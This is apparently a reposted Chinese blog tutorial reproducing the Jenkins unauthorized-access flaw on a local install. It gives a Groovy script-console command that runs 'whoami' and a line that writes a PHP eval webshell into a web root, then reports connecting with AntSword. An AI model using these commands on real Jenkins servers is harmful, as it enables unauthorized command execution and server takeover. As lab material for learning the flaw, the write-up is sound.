中间件安全-jenkins未授权访问

Posted 要热爱生活呀

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了中间件安全-jenkins未授权访问相关的知识,希望对你有一定的参考价值。

0x01 前言

跟着百度一步步做,也算是认识了


0x02 jenkins是什么?

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。


ps:不搞java开发,了解即可。

0x03 漏洞概述

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
默认端口为8080

0x04 漏洞复现

安装jenkins
链接:https://pan.baidu.com/s/1PzUlSp7Cw82x6zVsvpI6FA
提取码:9528


下载成功,运行后任务管理器开启jenkins服务。

然后再浏览器输入http://localhost:8080

找到脚本命令行,输入

println "whoami".execute().text


上传webshell

new File("D:\\\\phpstudy_pro\\\\WWW\\\\ma.php").write('<?php @eval($_POST[cmd]);?>');

蚁剑连接,成功

以上是关于中间件安全-jenkins未授权访问的主要内容,如果未能解决你的问题,请参考以下文章

中间件安全-jenkins未授权访问

jenkins 未授权访问-任意命令执行

常见未授权访问漏洞总结

JBoss未授权访问漏洞Getshell过程复现

35.为授权访问漏洞总结

关于redis未授权访问说法不正确的是